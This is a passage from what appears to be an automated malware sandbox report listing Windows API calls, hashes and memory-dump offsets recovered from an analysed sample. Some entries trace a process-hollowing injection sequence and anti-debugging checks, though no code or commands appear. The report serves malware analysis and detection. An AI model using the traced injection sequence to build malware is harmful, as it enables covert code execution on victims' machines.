                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                            • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction ID: 4f807017887e5f8913c2aeea080479d60b6d60ee751dd1f570b2424608bbb013
                                                                                                                                            • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                            • Instruction Fuzzy Hash: 2B526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA85CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AC6
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 0040442F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTempXinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 3948722134-1139504419
                                                                                                                                            • Opcode ID: ef58b5d7b2fc2acf2be8bd46d1d8b743e7a326cfe730c96aeb804ab7eba5e123
                                                                                                                                            • Instruction ID: 5a21870a1b3f15e693a5e1c71f5c19b149470408a097e6d1e3dfe317378d5c93
                                                                                                                                            • Opcode Fuzzy Hash: ef58b5d7b2fc2acf2be8bd46d1d8b743e7a326cfe730c96aeb804ab7eba5e123
                                                                                                                                            • Instruction Fuzzy Hash: A9C21671E1010897EB18DF78CD8579D7B62AF81304F50862EF849A73C6DB3D9AC48B99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                            • Opcode ID: 23b0e9fffb570bd23e9ba4d4b97d6b6ddba1e16fe5578a4b4f0ee9eb49260719
                                                                                                                                            • Instruction ID: 11c41e0c62b493da908bae2c5f8d30217ed4bb9da9ed4355a594f427151aa790
                                                                                                                                            • Opcode Fuzzy Hash: 23b0e9fffb570bd23e9ba4d4b97d6b6ddba1e16fe5578a4b4f0ee9eb49260719
                                                                                                                                            • Instruction Fuzzy Hash: 1F712370E00208CBEF04DFA8D985BDEBB75EF41308F60056AE415772C2D779A99ACB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00417317: GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,0042CEB8,?,00000000,?,00403AF0,00403AF0,00403AF0,?,?,?,00411385,?,0042CEB8,00000010), ref: 00417CD3
                                                                                                                                            • GetLastError.KERNEL32(?,00403AF0,00403AF0,00403AF0,?,?,?,00411385,?,0042CEB8,00000010,00403AF0), ref: 00417CDD
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00417D22
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 251514795-0
                                                                                                                                            • Opcode ID: 88ed46c356648d2431f951e701bd50101076533be664df1bdc63266b39295ba1
                                                                                                                                            • Instruction ID: 36d9eabd3e715f6953566ed8e5b4e0fbe87fa1013ae511c99846ca3037606271
                                                                                                                                            • Opcode Fuzzy Hash: 88ed46c356648d2431f951e701bd50101076533be664df1bdc63266b39295ba1
                                                                                                                                            • Instruction Fuzzy Hash: 3951E671A0810AABDB109FA5C845BEE7B79EF09318F140457E500A7252E779D9C1C7A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041AD88
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041ADF6
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00420090,?,00000000,00000000), ref: 0041AD3D
                                                                                                                                              • Part of subcall function 004159AA: RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            • _free.LIBCMT ref: 0041ADE7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2560199156-0
                                                                                                                                            • Opcode ID: 2ccccc104de4fbb99a6b5bc1a6cd37a2050fdcf250c8ed299f027ac6111690bb
                                                                                                                                            • Instruction ID: fd89c7a163a8027ad253a585f87d93024623262f666475df872d6ca9d46d71fb
                                                                                                                                            • Opcode Fuzzy Hash: 2ccccc104de4fbb99a6b5bc1a6cd37a2050fdcf250c8ed299f027ac6111690bb
                                                                                                                                            • Instruction Fuzzy Hash: 4F01FCB2703A117B272155776C89CFB686ECDC6B96315012BB904C7205F96D8C9281BB
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00403AF0,?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 0041566A
                                                                                                                                            • GetLastError.KERNEL32(?,00415542,00403AF0,0042CFD8,0000000C,004155F4,0042CEB8), ref: 00415674
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041569F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 490808831-0
                                                                                                                                            • Opcode ID: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction ID: 855a1b191d83c3e9394ad136f7d9456ed2f12c59f6f5d489b6f4b645ce6e1dde
                                                                                                                                            • Opcode Fuzzy Hash: 807730107f36a853c18b8d279feb0625d776876c165a816df0ebc4419417172f
                                                                                                                                            • Instruction Fuzzy Hash: 6B01E53270065096D6201235E845BFF77494BC2738FAA026FF81D872C2DAA8CCD1959C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: ^SA
                                                                                                                                            • API String ID: 269201875-154051897
                                                                                                                                            • Opcode ID: 3c657778f813c6f5b268f77ec237247de32264da0647686e6659de1cfa0cedb8
                                                                                                                                            • Instruction ID: 6034d8ea27f616415ff3ffdc71913a6cbd744896c4c1229f28ba72df701dd8a7
                                                                                                                                            • Opcode Fuzzy Hash: 3c657778f813c6f5b268f77ec237247de32264da0647686e6659de1cfa0cedb8
                                                                                                                                            • Instruction Fuzzy Hash: 50014472C0015DBFCF02EFE99C01AEE7FB5AF08354F144166F914E2161E6358AA1DB95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 1279760036-1441434633
                                                                                                                                            • Opcode ID: 3bd37d5dbf1b6b8b678fbc2b31860561537f1e264468bfb84b0ddc090e443fbb
                                                                                                                                            • Instruction ID: e35ac5e7cece6743c5da4249d19359c5bf9691d5dcfee95049b00cefedf1e07c
                                                                                                                                            • Opcode Fuzzy Hash: 3bd37d5dbf1b6b8b678fbc2b31860561537f1e264468bfb84b0ddc090e443fbb
                                                                                                                                            • Instruction Fuzzy Hash: 3CE0E5B1251A10DBE63126665C01BDB7A48DFC13B1F160127AC00D6290CA6CCCC281AF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404B4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404C75
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00404FEA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405238
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0040535F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00405486
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004055AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004056D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00406E95
                                                                                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00406EA7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3401506121-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E02
                                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004159AA: RtlAllocateHeap.NTDLL(00000000,?,?,2!A,0041A862,00000220,?,?,?,?,?,?,00412132,?), ref: 004159DC
                                                                                                                                            • _free.LIBCMT ref: 0041DEC3
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 314386986-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02100929
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 560597551-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 004020EC
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00402145
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0040215E
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00402173
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00402196
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 004021AE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021B5
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 004021D4
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 004021EF
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040222C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0040225C
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00402272
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040227B
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00402289
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 004022A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                            • API String ID: 4033543172-1050664331
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0210233C
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 02102395
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 021023AE
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 021023C3
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 021023E6
                                                                                                                                            • GetModuleHandleA.KERNEL32(0042BCFC,0042BCE4,?,00000000,00000000), ref: 021023FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02102405
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 02102424
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0210243F
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0210247C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 021024AC
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 021024C2
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 021024CB
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 021024D9
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 021024F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033543172-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403C86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 209486ba1ab70bc4b47f221b73ef8462f8ca94ae43bc4868a889ca66473e6326
                                                                                                                                            • Instruction ID: fc88b0bca923a07532a6eb78641dceaa207a15a50886e6470e9b438ae10ccdb1
                                                                                                                                            • Opcode Fuzzy Hash: 209486ba1ab70bc4b47f221b73ef8462f8ca94ae43bc4868a889ca66473e6326
                                                                                                                                            • Instruction Fuzzy Hash: 3E61E271E092089BEB20DF69DC457ADBBB9EB05316F5002BBD804A73C0E7794A8487C9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02113C90
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02113C9A
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 02113CA7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 19449bc542352132481959d704c5729f1a67276622b0d3b4a61f36b47e3d8f04
                                                                                                                                            • Instruction ID: dd1efc89bb670abb5476e4cafe0d077195d7ba61027a90424838ed2b29721755
                                                                                                                                            • Opcode Fuzzy Hash: 19449bc542352132481959d704c5729f1a67276622b0d3b4a61f36b47e3d8f04
                                                                                                                                            • Instruction Fuzzy Hash: 1531C57494122C9BCB21DF64D889BCCBBB8BF08310F5041EAE41DA7290EB709B858F49
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00413A40
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00413A4A
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00413A57
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: 1b58fb1c12a4467edf4b1aa6b652b91fceb493b3b189146260a7fecfde64fd15
                                                                                                                                            • Instruction ID: 6175a4c4d39221674b44a327f0cd8fe6ae741a78192ccc9b53f76126df92d1ad
                                                                                                                                            • Opcode Fuzzy Hash: 1b58fb1c12a4467edf4b1aa6b652b91fceb493b3b189146260a7fecfde64fd15
                                                                                                                                            • Instruction Fuzzy Hash: A731C7749112289BCB21DF25D889BDDB7B4BF08350F5042EAE81CA7290E7749F858F48
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02102B5D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
